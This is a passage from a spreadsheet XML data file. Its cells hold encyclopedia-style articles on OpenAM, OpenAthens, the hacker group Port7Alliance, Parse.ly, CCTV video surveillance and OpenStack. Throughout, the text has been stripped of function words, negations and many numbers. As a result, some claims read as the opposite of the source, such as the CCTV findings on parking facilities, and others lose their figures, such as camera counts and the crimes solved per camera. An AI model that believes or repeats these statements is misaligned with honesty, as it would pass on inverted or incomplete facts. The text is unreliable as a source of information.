system failover session failover. these features help ensure single point failure exists deployment, openam service always available end-users. redundant openam servers, policy agents, load balancers prevent single point failure. session failover ensures user's session continues uninterrupted, user data lost. developer access openam provides client application programming interfaces java apis restful return json http, allowing users access authentication, authorization, identity services applications using rest clients language choice. oauth2 also provides rest interface modern, lightweight federation authorization protocol. also glassfish opends opendj openidm list single sign-on implementations references external links forgerock official website (proprietary) openam open opensso (inactive) project page opensso open "opensso". freecode.</t>
  </si>
  <si>
    <t>OpenAthens</t>
  </si>
  <si>
    <t>openathens identity access management service, supplied jisc, british not-for-profit information technology services company. identity provider (idp) organisations keep usernames cloud, locally both. integration adfs, ldap saml supported.openathens publishers (sp) software service providers supports multiple platforms federations. history with origins university bath initiative reduce procurement costs universities, athens project conceived 1996. spun bath university vehicle charitable status, eduserv established not-for-profit organisation 1999. service originally named athena greek goddess knowledge learning; rumoured name change partially caused common typo, actually name athena already trademarked (eu000204735). launched 'athens' 1997 (uk00002153200). after jisc decided support shibboleth rather athens 2008, eduserv launched federated version athens 'openathens' (eu013713821). also federated identity saml saml-based products services shibboleth (shibboleth consortium) references external links openathens</t>
  </si>
  <si>
    <t>Port7Alliance</t>
  </si>
  <si>
    <t>port7alliance north american hacker group responsible production internet based magazine radical future. radical future's presence electronic magazine cultural significance online american hacker community. e-zine freely distributed online adobe acrobat file consisted five issues. history port7alliance thought 14-year-old computer enthusiast named darien, january 2001 watching commercial featuring avery brooks. avery brooks explains definition epiphany commercial.darien took hacker handle 'epiphany'. promote port7alliance, epiphany wrote manifesto concerning significance term computer hacker. manifesto, simply titled epiphany archived textfiles.com.in spring 2002, port7alliance released first issue radical future. radical future ezine radical future intermittently spring 2002 spring 2004 briefly available sale printed form h.o.p.e.. present time port7alliance disbanded. however, site still live. certain members port7alliance still found hacker cons h.o.p.e. references external links official website radical future site mobile hacking</t>
  </si>
  <si>
    <t>Parse.ly</t>
  </si>
  <si>
    <t>parse.ly technology company provides analytics content optimization software online publishers. parse.ly built three products, parse.ly reader, parse.ly publisher platform, latest parse.ly dash, analytics tool large publishers. overview parse.ly content optimization platform online publishers. parse.ly's product, dash, built parse.ly platform. dash parses articles publisher's site, analyzes identify data around metrics specific publishers topics, authors, sections, referrers. technology uses natural language processing, extracted 350,000 unique topics urls crawled. addition providing site analytics, dash show users topics resonating people across webwide trends interface. parse.ly founded sachin kamdar andrew montalenti dreamit ventures, early stage startup accelerator program philadelphia launched first product, parse.ly reader, september 2009. funding 2009, parse.ly received $20k seed funding dreamit ventures. december 2010, parse.ly received $1.8m series funding blumberg capital, venture capital, scott becker (cofounder invite media), hutchison, jonathan axelrod, jeffrey greenblatt.in february 2021, parse.ly acquired automattic. financial terms acquisition disclosed. references taylor, mike (2012-04-07). "parse.ly raises $800,000". york observer. retrieved 2012-04-14. "parse.ly: better feeds less garnish". zdnet. retrieved 2012-04-14. external links</t>
  </si>
  <si>
    <t>Video surveillance</t>
  </si>
  <si>
    <t>closed-circuit television (cctv), also known video surveillance, video cameras transmit signal specific place, limited monitors. differs broadcast television signal openly transmitted, though employ point-to-point (p2p), point-to-multipoint (p2mp), mesh wired wireless links. even though almost video cameras definition, term often applied used surveillance areas require additional security ongoing monitoring (videotelephony seldom called "cctv"). surveillance public using cctv common many areas around world. recent years, body worn video cameras introduced form surveillance, often used enforcement, cameras located police officer's chest head. video surveillance generated significant debate balancing individuals' right privacy even public.in industrial plants, cctv equipment used observe parts process central control room. example, environment suitable humans. cctv systems operate continuously required monitor particular event. advanced form cctv, using digital video recorders (dvrs), provides recording possibly many years, variety quality performance options extra features (such motion detection email alerts). more recently, decentralized cameras, perhaps equipped megapixel sensors, support recording directly network-attached storage devices, internal flash completely stand-alone operation. estimate, approximately billion surveillance cameras worldwide 2021. about cameras installed asia. growth cctv slowing recent years. deployment technology facilitated significant growth state surveillance, substantial rise methods advanced social monitoring control, host crime prevention measures throughout world. history early mechanical cctv system developed june 1927 russian physicist léon theremin (cf. television soviet union). originally requested soviet labor defense, system consisted manually-operated scanning-transmitting camera wireless shortwave transmitter receiver, resolution hundred lines. having commandeered kliment voroshilov, theremin's cctv system demonstrated joseph stalin, semyon budyonny, sergo ordzhonikidze, subsequently installed courtyard moscow kremlin monitor approaching visitors.another early cctv system installed siemens test stand peenemünde, nazi germany 1942, observing launch rockets.in u.s. first commercial closed-circuit television system became available 1949, called vericon. very little known vericon except advertised requiring government permit. technology earliest video surveillance systems involved constant monitoring record store information. development reel-to-reel media enabled recording surveillance footage. these systems required magnetic tapes changed manually, time-consuming, expensive unreliable process, operator manually thread tape tape reel recorder onto take-up reel. shortcomings, video surveillance widespread. technology became available 1970s, making easier record erase information, video surveillance became common.during 1990s, digital multiplexing developed, allowing several cameras record once, well time lapse motion-only recording. this saved time money increase cctv.recently cctv technology enhanced shift toward internet-based products systems, technological developments. application closed-circuit television used form pay-per-view theatre television sports professional boxing professional wrestling, 1964 1970, indianapolis automobile race. boxing telecasts broadcast live select number venues, mostly theaters, viewers paid tickets watch fight live. first fight closed-circuit telecast louis walcott 1948. closed-circuit telecasts peaked popularity muhammad 1960s 1970s, "the rumble jungle" fight drawing million cctv viewers worldwide 1974, "thrilla manila" drawing million cctv viewers worldwide 1975. 1985, wrestlemania professional wrestling show seen million viewers scheme. late 1996, julio césar chávez oscar hoya boxing fight 750,000 viewers. although closed-circuit television gradually replaced pay-per-view home cable television 1980s 1990s, still today awards shows events transmitted live venues network television, later re-edited broadcast.marie brittan brown first pioneered patented cctv home security system, much technology still used home security systems today (u.s. patent 3,482,037). september 1968, olean, york first city united states install video cameras along main business street effort fight crime. another early appearance 1973 times square york city. nypd installed deter crime area; however, crime rates appear drop much cameras. nevertheless, 1980s video surveillance began spread across country specifically targeting public areas. seen cheaper deter crime compared increasing size police departments. some businesses well, especially prone theft, began video surveillance. from mid-1990s police departments across country installed increasing number cameras various public spaces including housing projects, schools public parks departments. cctv later became common banks stores discourage theft, recording evidence criminal activity. 1997, 3,100 cctv systems installed public housing residential areas york city.experiments 1970s 1980s, including outdoor cctv bournemouth 1985, several larger trial programs later decade. first local government king's lynn, norfolk, 1987. uses crime prevention 2009 systematic review researchers northeastern university university cambridge used meta-analytic techniques pool average effect cctv crime across different studies.the studies included meta-analysis used quasi-experimental evaluation designs involve before-and-after measures crime experimental control areas. however, several researchers pointed methodological problems associated research literature. first, researchers argued british park studies included meta-analysis cannot accurately control fact cctv introduced simultaneously range security-related measures. second, noted that, many studies, issues selection bias since introduction cctv potentially endogenous previous crime trends. particular, estimated effects biased cctv introduced response crime trends.it argued problems selection bias endogeneity addressed stronger research designs randomized controlled trials natural experiments. 2017 review published journal scandinavian studies criminology crime prevention compiles seven studies research designs. studies included review found cctv reduced crime 24-28% public streets urban subway stations. also found cctv could decrease unruly behaviour football stadiums theft supermarkets/mass merchant stores. however, evidence cctv desirable effects parking facilities suburban subway stations. furthermore, review indicates cctv effective preventing property crimes violent crimes. another question effectiveness cctv policing around uptime system; 2013 city philadelphia auditor found $15m system operational time. there strong anecdotal evidence cctv aids detection conviction offenders; example, police forces routinely seek cctv recordings crimes. moreover, cctv played crucial role tracing movements suspects victims widely regarded anti-terrorist officers fundamental tool tracking terrorist suspects. large-scale cctv installations played part defenses terrorism since 1970s. cameras also installed public transport hope deterring crime.a open question whether cctv cost-effective. while low-quality domestic kits cheap, professional installation maintenance high definition cctv expensive. gill spriggs cost-effectiveness analysis (cea) cctv crime prevention showed little monetary saving installation cctv crimes prevented resulted little monetary loss. critics however noted benefits non-monetary value cannot captured traditional cost effectiveness analysis omitted study. 2008 report police chiefs concluded crimes solved cctv. london, metropolitan police report showed 2008 crime solved 1000 cameras. cases cctv cameras become target attacks themselves.cities manchester using dvr-based technology improve accessibility crime prevention.in october 2009, "internet eyes" website announced would members public view cctv camera images homes report crimes witnessed. site aimed "more eyes" cameras might insufficiently monitored. civil liberties campaigners criticized idea distasteful worrying development".in 2013 oaxaca hired deaf police officers read conversations uncover criminal conspiracies.in singapore, since 2012, thousands cctv cameras helped deter loan sharks, litterbugs stop illegal parking, according government figures. crime solving cctv also used help solve crimes. london alone, crimes solved cctv footage. body worn recent years, body worn video cameras introduced number uses. example, form surveillance enforcement, cameras located police officer's chest head. traffic flow monitoring vehicle traffic many cities motorway networks extensive traffic-monitoring systems, using closed-circuit television detect congestion notice accidents. many cameras however, owned private companies transmit data drivers' systems. highways england publicly owned cctv network 3000 pan-tilt-zoom cameras covering british motorway trunk road network. these cameras primarily used monitor traffic conditions used speed cameras. with addition fixed cameras active traffic management system, number cameras highways england's cctv network likely increase significantly next years.the london congestion charge enforced cameras positioned boundaries inside congestion charge zone, automatically read number plates vehicles enter zone. driver charge fine imposed. similar systems developed means locating cars reported stolen.other surveillance cameras serve traffic enforcement cameras. pedestrian traffic mecca, cctv cameras used monitoring (and thus managing) flow crowds.in philippines, barangay antonio used cctv cameras artificial intelligence software detect formation crowds outbreak disease. security personnel sent whenever crowd formed particular location city. management infection increasing safety security public transport driver-only operated train cctv cameras allow driver confirm people clear doors closing starting train.a trial 2011 facial recognition cameras mounted trams made sure people banned sneak anyway. sporting events many sporting events united states cctv inside venue, either display stadium arena's scoreboard, concourse restroom areas allow fans view action outside seating bowl. cameras send feed central control center producer selects feeds send television monitors fans view. cctv monitors viewing event attendees often placed lounges, hallways, restrooms. trial cctv cameras, football club fans longer needed identify manually, could pass freely authorized facial recognition system. employee monitoring organizations cctv monitor actions workers. every action recorded information block subtitles explain performed operation. this helps track actions workers, especially making critical financial transactions, correcting cancelling sale, withdrawing money altering personal information. actions employer wish monitor could include: scanning goods, selection goods, introduction price quantity; input output operators system entering passwords; deleting operations modifying existing documents; implementation certain operations, financial statements operations cash; moving goods, revaluation scrapping counting; control kitchen fast food restaurants; change settings, reports official functions.each operations transmitted description, allowing detailed monitoring actions operator. some systems allow user search specific event time occurrence text description, perform statistical evaluation operator behaviour. this allows software predict deviations standard workflow record anomalous behaviour. schools united states, britain, canada, australia zealand, cctv widely used schools success preventing bullying, vandalism, monitoring visitors maintaining record evidence crime. there restrictions, cameras installed areas "reasonable expectation privacy", bathrooms, locker areas private offices (unless consent office occupant given). cameras generally acceptable hallways, parking lots, front offices students, employees, parents come gymnasiums, cafeterias, supply rooms classrooms. some teachers object installation cameras.a study high school students israeli schools shows students' views cctv used school based think teachers, school, authorities. also stated students want cctv installed inside classroom. private homes many homeowners choose install cctv systems either inside outside homes, sometimes both. cctv cameras effective deterrent potential intruders increases risk identification camera footage. someone scouts affluent suburb seeking easiest house break into, obvious cctv system, alarm another security measure, makes house appear difficult target likely move next house. modern cctv systems monitored mobile phone apps allows people view live footage house anywhere internet coverage. some systems provide motion detection movement detected, alert sent phone. criminal criminals surveillance cameras monitor public. example, hidden camera capture people's pins entered, without knowledge. devices small enough noticed, placed monitor keypad machine people enter pins. images transmitted wirelessly criminal. even lawful surveillance cameras sometimes data hands people legal right receive shopping malls retail stores theft huge concern many department stores shopping malls. cctv helps protect stores' assets, ensures safety employees customers. this instills secure, safe, inviting experience visitors.it even important choose right camera. cctv system must have: high resolution camera ensure image clarity high-capacity digital storage ensure 24/7 recording right placement good lighting prevalence asia about cctv cameras world installed asia. asia, different human activities attracted surveillance camera systems services, including limited business related industries, transportation, sports, care environment.in 2018, china reported huge surveillance network million cctv cameras million cameras expected installed next three years, many facial recognition technology. united states there estimated million surveillance cameras united states 2011. video surveillance common united states since 1990s; example, manufacturer reported earnings $120 million 1995. with lower cost easier installation, sales home security cameras increased early 21st century. following september attacks, video surveillance public places became common deter future terrorist attacks. under homeland security grant program, government grants available cities install surveillance camera networks. 2009, estimated 15,000 cctv systems chicago, many linked integrated camera network. york city's domain awareness system 6,000 video surveillance cameras linked together, 4,000 cameras subway system (although nearly half work), two-thirds large apartment commercial buildings video surveillance cameras. washington, d.c. 30,000 surveillance cameras schools, metro nearly 6,000 cameras across system. united kingdom united kingdom, vast majority cctv cameras operated government bodies, private individuals companies, especially monitor interiors shops businesses. according freedom information 2000 requests, total number local government operated cctv cameras around 52,000 entirety uk.an article published cctv image magazine estimated number private local government operated cameras united kingdom 1.85 million 2011. estimate based extrapolating comprehensive survey public private cameras within cheshire constabulary jurisdiction. this works average camera every people although density cameras varies greatly place place. cheshire report also claims average person typical would seen cctv cameras.the cheshire figure regarded dependable previous study michael mccahill clive norris urbaneye published 2002. based small sample putney high street, mccahill norris extrapolated number surveillance cameras greater london around 500,000 total number cameras around 4,200,000. according estimate camera every people. although acknowledged several years methodology behind figure flawed, widely quoted. furthermore, figure 500,000 greater london often confused figure police local government operated cameras city london, 2011.the cctv user group estimated around million private local government cctv cameras city centres, stations, airports, major retail areas uk.research conducted scottish centre crime justice research based survey scottish local authorities, identified 2,200 public space cctv cameras scotland. canada project scram policing effort halton regional police service register help consumers understand complex issues privacy safety confront households dealing installations home security systems. "the scram program enables community members voluntarily identify register residential video surveillance equipment simple, secure, confidential, online form." extended commercial businesses. wide-ranging effort provide registration monitoring home security systems. "security camera registration monitoring community-based crime prevention opportunity investigative tool enlists help residents help prevent crime three levels. residential video surveillance cameras deter criminals entering area, prevent crimes occurring help solve crimes providing valuable evidence police." south africa south africa high crime rate cctv surveillance widely prevalent country slow implement latest technology e.g. first camera released 1996 axis communications cameras arrive south africa till 2008. regulate number suppliers 2001 private security industry regulation passed requiring security companies registered private security industry regulatory authority (psira). latin america latin america, cctv market growing rapidly increase property crime. installation cctv camera increasing crime somewhat controlled. russia number cctv cameras equipped facial biometrics moscow's public surveillance network grow times current 1,500 105,000 year. cctv system moscow recognize faces using algorithm based neural networks. city camera recordings analyzed real-time. faces screen scanned checked several databases, police database, identify suspect. this analytical system also help police recreate suspect's movements around city. system searches related recordings various cctv cameras identifies face several sightings. moscow network includes 160,000 cctv cameras percent residential buildings. year, residents able install cctv cameras private buildings connecting unified video observation system. this year, 3,500 cameras connected general centre data storage processing. this includes cameras entrance halls, schools kindergartens, stations, stadiums, public transport stops terminals, parks. video recordings used solve percent offenses crimes. cameras also help monitor utility services. department spokesperson added moscow largest security systems world comprehensive identification system video surveillance terrorism material collected surveillance cameras used tool post-event forensics identify tactics, techniques perpetrators terrorist attacks. furthermore, various projects indect detect suspicious behaviours individuals crowds. argued terrorists deterred cameras, terror attacks really subject current video surveillance terrorists might even extra channel propaganda publication acts. germany calls extended video surveillance country's main political parties, spd, dismissed "little placebo subjective feeling security" member left party. privacy proponents cctv cameras argue cameras effective deterring solving crime, appropriate regulation legal restrictions surveillance public spaces provide sufficient protections individual's right privacy reasonably weighed benefits surveillance. however, anti-surveillance activists held right privacy public areas. furthermore, true scenarios wherein person's right public privacy reasonably justifiably compromised, scholars argued situations rare sufficiently warrant frequent compromising public privacy rights occurs regions widespread cctv surveillance. example, book setting watch: privacy ethics cctv surveillance, beatrice silva-tarouca larsen argues cctv surveillance ethically permissible "certain restrictively defined situations", specific location "comprehensively documented significant criminal threat".in united states, constitution explicitly include right privacy although supreme court said several amendments constitution implicitly grant right. access video surveillance recordings require judge's writ, readily available. however, little legislation regulation specific video surveillance.all countries european union signatories european convention human rights protects individual rights including right privacy. eu's data protection directive regulates access personal data including cctv recordings. this directive translated national country within european union. united kingdom data protection 1998 imposes legal restrictions uses cctv recordings mandates registration cctv systems data protection agency. 2004, successor data protection agency, information commissioner's office clarified required registration cctv systems commissioner, prompt deletion archived recordings. however, subsequent case (durant fsa) limited scope protection provided law, cctv systems currently regulated.a 2007 report information commissioner's office, highlighted need public made aware growing surveillance potential impact civil liberties. year, campaign group claimed majority cctv cameras operated illegally breach privacy guidelines. response, information commissioner's office rebutted claim added reported abuses data protection swiftly investigated. even concerns arising cctv involving privacy, commercial establishments still installing cctv systems 2012, government enacted protection freedoms includes several provisions related controlling restricting collection, storage, retention, information individuals. under act, home office published code practice 2013 surveillance cameras government local authorities. code help ensure "characterised surveillance consent, consent part community must informed consent assumed system operator. surveillance consent regarded analogous policing consent."in canada, video surveillance grown rapidly. ontario, municipal provincial versions freedom information protection privacy outline specific guidelines control images information gathered method released.in sweden, cctv public spaces regulated nationally gdpr (the european privacy act). national legislation requires permits public operators (except law-enforcement agencies since january 2020) install cctv spaces allow access general public. opinion poll commissioned lund university august 2017, general public sweden asked choose measure would ensure need privacy subject cctv-operation public spaces: favored regulation form clear routines managing, storing distributing image material generated surveillance cameras, favored regulation form clear signage informing camera surveillance public spaces present, favored regulation form permits restricting surveillance cameras certain times day/week, favored regulation form restrictive policies issuing permits surveillance cameras public spaces, unsure know. technological developments computer-controlled analytics identification computer-controlled cameras identify, track, categorize objects field view.video content analysis, also referred video analytics, capability automatically analyzing video detect determine temporal events based single image, rather object classification. last decade, improved features developed. beyond recognizing specific shapes colors, applications analyze complex scenarios. advanced applications accurately classify object types based shape motion behavior also measure object speed. some video analytics applications used virtually apply rules designated areas. these rules relate access control. example, describe objects enter specific area, allowed enter within circumstances. virtually applied rules also relate various motion situations. based cctv systems detect anomalies crowd, instance person moving opposite direction normally expected (e.g. debarking plane airport exiting entrance subway).there different approaches implementing technology. data processed camera (edge processing) centralized server. both approaches pros cons. many, development cctv public areas, linked computer databases people's pictures identity, presents serious breach civil liberties. critics fear technology lead loss anonymity public places. retention, storage preservation there cost retention images produced cctv systems. amount quality data stored storage media subject compression ratios, images stored second, image size affected retention period videos images. dvrs store images variety proprietary file formats. recordings retained preset amount time automatically archived, overwritten deleted, period determined organisation generated them. cameras growing branch cctv internet protocol cameras cameras). estimated 2014 first year cameras outsold analog cameras. cameras internet protocol (ip) used local area networks (lans) transmit video across data networks digital form. optionally transmitted across public internet, allowing users view cameras remotely computer phone internet connection. professional public infrastructure security applications, video restricted within private network vpn. cameras considered part internet things (iot) many benefits security risks ip-enabled devices.main types cameras include: fixed cameras, pan-tilt-zoom (ptz) cameras multi-sensor cameras. fixed cameras' resolution vary based application area, typically exceed main feature remote directional optical zoom capability. with multi-sensor cameras, wider areas monitored hundreds megapixel resolution achieved. industrial video surveillance systems network video recorders support cameras. these devices responsible recording, storage, video stream processing alarm management. since 2008, video surveillance manufacturers standardized network interface (onvif) support compatibility systems. networking cctv cameras city chicago operates networked video surveillance system combines cctv video feeds government agencies private sector, installed city buses, businesses, public schools, subway stations, housing projects etc. even homeowners able contribute footage. estimated incorporate video feeds total 15,000 cameras.the system used chicago's office emergency management case emergency call: detects caller's location instantly displays real-time video feed nearest security camera operator, requiring user intervention. while system vast allow complete real-time monitoring, stores video data evidence criminal cases. wireless security cameras many consumers turning wireless security cameras home surveillance. wireless cameras require video cable video/audio transmission, simply cable power. wireless cameras also easy inexpensive install lack reliability hard-wired cameras. previous generations wireless security cameras relied analogue technology; modern wireless cameras digital technology delivers crisper audio, sharper video, secure interference-free signal. talking cctv wiltshire, 2003, pilot scheme known "talking cctv" action; allowing operators cctv cameras order offenders stop doing, ranging ordering subjects pick rubbish ordering groups vandals disperse. 2005, mallon, mayor former senior police officer middlesbrough implemented "talking cctv" area.other towns cameras installed. 2007 several devices installed bridlington town centre, east riding yorkshire. countermeasures widespread implementation surveillance cameras, glasses built defeat cctv cameras. december 2016 form anti-cctv facial recognition sunglasses called 'reflectacles' invented custom-spectacle-craftsman based chicago named scott urban. they reflect infrared and, optionally, visible light makes user's face white blur cameras. project easily surpassed funding goal $28,000 reflectacles became commercially available june 2017. also notes references further reading armstrong, gary, (1999). maximum surveillance society: rise cctv. berg (originally, university michigan press). isbn 9781859732212. fyfe, nicholas; bannister, (2005). "city watching: closed-circuit television public spaces". fyfe, nicholas; kenny, judith (eds.). urban geography reader. psychology press. isbn 9780415307017. nassauer, anne (2018). "how robberies succeed fail: analyzing crime caught cctv". journal research crime delinquency. (1): 125–154. doi:10.1177/0022427817715754. newburn, tim; hayman, stephanie (2001). policing, surveillance social control: cctv police monitoring suspects. taylor francis. isbn 9781843924692. norris, clive (2003). "from personal digital: cctv, panopticon, technological mediation suspicion social control". lyon, david (ed.). surveillance social sorting: privacy, risk, digital discrimination. psychology press. isbn 9780415278737. (2019). introduction intelligent surveillance: surveillance data capture, transmission, analytics, springer london. external links assessing impact cctv, home office study effectiveness closed-circuit television</t>
  </si>
  <si>
    <t>OpenStack</t>
  </si>
  <si>
    <t>openstack free, open standard cloud computing platform. mostly deployed infrastructure-as-a-service (iaas) public private clouds virtual servers resources made available users. software platform consists interrelated components control diverse, multi-vendor hardware pools processing, storage, networking resources throughout data center. users manage either web-based dashboard, command-line tools, restful services. openstack began 2010 joint project rackspace hosting nasa. 2012, managed openstack foundation, non-profit corporate entity established september 2012 promote openstack software community. 2018, companies joined project. 2020 foundation announced would renamed open infrastructure foundation 2021. history july 2010, rackspace hosting nasa announced open-source cloud-software initiative known openstack. mission statement produce ubiquitous open source cloud computing platform meet needs public private clouds regardless size, simple implement massively scalable".the project intended help organizations offer cloud-computing services running standard hardware. community's first official release, code-named austin, appeared three months later october 2010 (2010-10-21), plans release regular updates software every months. early code came nasa's nebula platform well rackspace's cloud files platform. cloud stack open stack modules merged released open source nasa nebula team concert rackspace. 2011, developers ubuntu linux distribution adopted openstack unsupported technology preview openstack "bexar" release ubuntu 11.04 "natty narwhal". ubuntu's sponsor canonical introduced full support openstack clouds, starting openstack's cactus release.openstack became available debian openstack "cactus" release 2011, first release debian including openstack debian (code name "wheezy"), including openstack 2012.1 (code name: "essex").in october 2011, suse announced public preview industry's first fully configured openstack powered appliance based "diablo" openstack release. august 2012, suse announced commercially supported enterprise openstack distribution based "essex" release.in november 2012, uk's government digital service (gds) launched inside government based opennasa v2.0 government platform (gaap) model. 2012, announced preview openstack distribution, beginning "essex" release. after another preview release, introduced commercial support openstack "grizzly" release, july 2013.the openstack organization grown rapidly supported companies.in 2012 nasa withdrew openstack active contributor, instead made strategic decision amazon services cloud-based services. july 2013, nasa released internal audit citing lack technical progress factors agency's primary reason dropping active developer project instead focus public clouds. this report contradicted part remarks made ames research center cio, o'brien.in december 2013, oracle announced joined openstack sponsor planned bring openstack oracle solaris, oracle linux, many products. followed announcing oracle openstack distributions oracle solaris oracle linux using icehouse september 2014.in 2014, announced helion released preview helion openstack community, beginning icehouse release. operated helion public cloud openstack since 2012.at 2014 interop tech field day, software-defined networking demonstrated avaya using shortest path bridging openstack automated campus, extending automation data center device, removing manual provisioning service delivery.as march 2015, nasa still makes openstack private cloud rfps openstack public cloud support. historical names several openstack projects changed names trademark issues. neutron formerly known quantum. sahara used called savanna. designate previously known moniker. trove formerly known reddwarf. zaqar formerly known marconi. release history openstack development openstack community collaborates around six-month, time-based release cycle frequent development milestones.during planning phase release, community would gather openstack design summit facilitate developer working sessions assemble plans. these design summits would coincide openstack summit conference. starting pike development cycle design meetup activity separated separate project teams gathering (ptg) event. this done avoid developer distractions caused presentations customer meetings happening openstack summit allow design discussions happen ahead start next cycle. recent openstack summits taken place shanghai november 2019, denver april-1 2019, berlin 13–19 november 2018, vancouver 21–25 2018, sydney november 2017, boston 8–11 2017, austin 25–29 april 2016, barcelona 25–28 october 2016. earlier openstack summits taken place also tokyo october 2015, vancouver 2015, paris november 2014. summit 2014 atlanta drew 4,500 attendees increase hong kong summit months earlier. components openstack modular architecture various code names components. compute (nova) nova openstack project provides provision compute instances virtual machines, real hardware servers (through ironic), limited support system containers. nova runs daemons existing linux servers provide service.nova written python. uses many external python libraries eventlet (concurrent networking library), kombu (amqp messaging framework), sqlalchemy (sql toolkit object relational mapper). nova designed horizontally scalable. rather switching larger servers, procure servers simply install identically configured services.due widespread integration enterprise-level infrastructures, monitoring openstack performance general, nova performance particular, scaling became increasingly important issue. monitoring end-to-end performance requires tracking metrics nova, keystone, neutron, cinder, swift services, addition monitoring rabbitmq used openstack services message passing. services generate files, which, especially enterprise-level infrastructures, also monitored. networking (neutron) neutron openstack project provide “network connectivity service” interface devices (e.g., vnics) managed openstack services (e.g., nova). implements openstack networking api.it manages networking facets virtual networking infrastructure (vni) access layer aspects physical networking infrastructure (pni) openstack environment. openstack networking enables projects create advanced virtual network topologies include services firewall, virtual private network (vpn).neutron allows dedicated static addresses dhcp. also allows floating addresses traffic dynamically rerouted. users software-defined networking (sdn) technologies like openflow support multi-tenancy scale. openstack networking deploy manage additional network services—such intrusion detection systems (ids), load balancing, firewalls, virtual private networks (vpn). block storage (cinder) cinder openstack block storage service providing volumes nova virtual machines, ironic bare metal hosts, containers more. some goals cinder be/have: component based architecture: quickly behaviors highly available: scale serious workloads fault-tolerant: isolated processes avoid cascading failures recoverable: failures easy diagnose, debug, rectify open standards: reference implementation community-driven apicinder volumes provide persistent storage guest virtual machines known instances, managed openstack compute software. cinder also used independent openstack services stand-alone software-defined storage. block storage system manages creation,replication, snapshot management, attaching detaching block devices servers. identity (keystone) keystone openstack service provides client authentication, service discovery, distributed multi-tenant authorization implementing openstack's identity api. common authentication system across cloud operating system. keystone integrate directory services like ldap. supports standard username password credentials, token-based systems aws-style (i.e. amazon services) logins. openstack keystone service catalog allows clients dynamically discover navigate cloud services. image (glance) image service (glance) project provides service users upload discover data assets meant used services. this currently includes images metadata definitions. images glance image services include discovering, registering, retrieving virtual machine (vm) images. glance restful allows querying image metadata well retrieval actual image. images made available glance stored variety locations simple filesystems object-storage systems like openstack swift project. metadata definitions glance hosts metadefs catalog. this provides openstack community programmatically determine various metadata names valid values applied openstack resources. object storage (swift) swift distributed, eventually consistent object/blob store. openstack object store project, known swift, offers cloud storage software store retrieve lots data simple api. it's built scale optimized durability, availability, concurrency across entire data set. swift ideal storing unstructured data grow without bound.in august 2009, rackspace started development precursor openstack object storage, complete replacement cloud files product. initial development team consisted nine developers. swiftstack, object storage software company, currently leading developer swift significant contributions intel, hat, ntt, ibm, more. dashboard (horizon) horizon canonical implementation openstack's dashboard, provides based user interface openstack services including nova, swift, keystone, etc. horizon ships three central dashboards, “user dashboard”, “system dashboard”, “settings” dashboard. between three cover core openstack applications deliver core support. horizon application also ships abstractions core openstack projects order provide consistent, stable reusable methods developers. using abstractions, developers working horizon need intimately familiar apis openstack project. orchestration (heat) heat service orchestrate multiple composite cloud applications using templates, openstack-native rest cloudformation-compatible query api. workflow (mistral) mistral service manages workflows. user typically writes workflow using workflow language based yaml uploads workflow definition mistral rest api. then user start workflow manually configure trigger start workflow event. telemetry (ceilometer) openstack telemetry (ceilometer) provides single point contact billing systems, providing counters need establish customer billing, across current future openstack components. delivery counters traceable auditable, counters must easily extensible support projects, agents data collections independent overall system. database (trove) trove database-as-a-service provisioning relational non-relational database engine. elastic reduce (sahara) sahara component easily rapidly provision hadoop clusters. users specify several parameters like hadoop version number, cluster topology type, node flavor details (defining disk space, settings), others. after user provides parameters, sahara deploys cluster minutes. sahara also provides means scale preexisting hadoop cluster adding removing worker nodes demand. bare metal (ironic) ironic openstack project provisions bare metal machines instead virtual machines. initially forked nova baremetal driver evolved separate project. best thought bare-metal hypervisor plugins interact bare-metal machines managed ironic. default, ipmi redfish concert provision manage physical machines, ironic supports extended vendor-specific plugins implement additional functionality.since inception ironic, spawned several sub-projects help support additional cases capabilities. some commonly leveraged projects include ironic-inspector, bifrost, sushy, networking-generic-switch. ironic-inspector supplies hardware information collection hardware discovery. bifrost focuses case operating without openstack components, highlighted website ironicbaremetal.org. sushy lightweight redfish client library. networking-generic-switch plugin supports managing switchport configuration bare metal machines. messaging (zaqar) zaqar multi-tenant cloud messaging service developers. service features fully restful api, developers send messages various components saas mobile applications using variety communication patterns. underlying efficient messaging engine designed scalability security mind. other openstack components integrate zaqar surface events users communicate guest agents "over-cloud" layer. shared file system (manila) openstack shared file system (manila) provides open manage shares vendor agnostic framework. standard primitives include ability create, delete, give/deny access share used standalone variety different network environments. commercial storage appliances emc, netapp, ibm, oracle, quobyte, infinidat hitachi data systems supported well filesystem technologies glusterfs ceph. (designate) designate multi-tenant rest managing dns. this component provides service compatible many backend technologies, including powerdns bind. provide service purpose interface existing servers manage zones tenant basis. search (searchlight) project longer actively maintained. searchlight provides advanced consistent search capabilities across various openstack cloud services. accomplishes offloading user search queries openstack servers indexing data elasticsearch. searchlight integrated horizon also provides command-line interface. manager (barbican) barbican rest designed secure storage, provisioning management secrets. aimed useful environments, including large ephemeral clouds. container orchestration (magnum) magnum openstack service developed openstack containers team making container orchestration engines docker swarm, kubernetes, apache mesos available first class resources openstack. magnum uses heat orchestrate image contains docker kubernetes runs image either virtual machines bare metal cluster configuration. root cause analysis (vitrage) vitrage openstack (root cause analysis) service organizing, analyzing expanding openstack alarms events, yielding insights regarding root cause problems deducing existence directly detected. rule-based alarm actions (aodh) this alarming service enables ability trigger actions based defined rules metric event data collected ceilometer gnocchi. compatibility cloud apis openstack strive compatibility clouds' apis. however, amount compatibility driven various members openstack community things important. project aims provide compatibility amazon project aims provide compatibility google compute engine governance openstack governed openinfra foundation board directors. board directors made platinum sponsors, members gold sponsors members elected foundation individual members. openstack technical committee governing body openstack open source project. elected group represents contributors project, oversight technical matters. this includes developers, operators users software. appliances openstack appliance name given software support openstack cloud computing platform either physical devices servers virtual machines combination two. typically software appliance software capabilities function without operating system. thus, must contain enough essential underlying operating system components work. therefore, strict definition might application designed offer openstack capability without necessity underlying operating system. however, applying strict definition helpful, really clear distinction appliance distribution. could argued term appliance something misnomer openstack referred cloud operating system using term openstack appliance could misnomer pedantic. look range appliances distributions could make distinction distributions toolsets attempt provide wide coverage openstack project scope, whereas appliance narrow focus, concentrating fewer projects. vendors heavily involved openstack since inception, since developed marketing wide range appliances, applications distributions. vendors large number vendors offer openstack solutions, meaning organization wishing deploy technology complex task selecting vendor offer best matches business requirements. barb darrow offered overview fortune 2015, pointing consolidation market clarify decisions. there aspects users need consider, example, real costs involved. some vendors make offer encompasses openstack projects; others offer certain components. other considerations include extent proprietary code used manage lack maturity openstack component, extent encourages vendor lock-in.the authoritative information vendor products open infrastructure foundation website. challenges implementation openstack complex entity, adopters face range challenges trying implement openstack 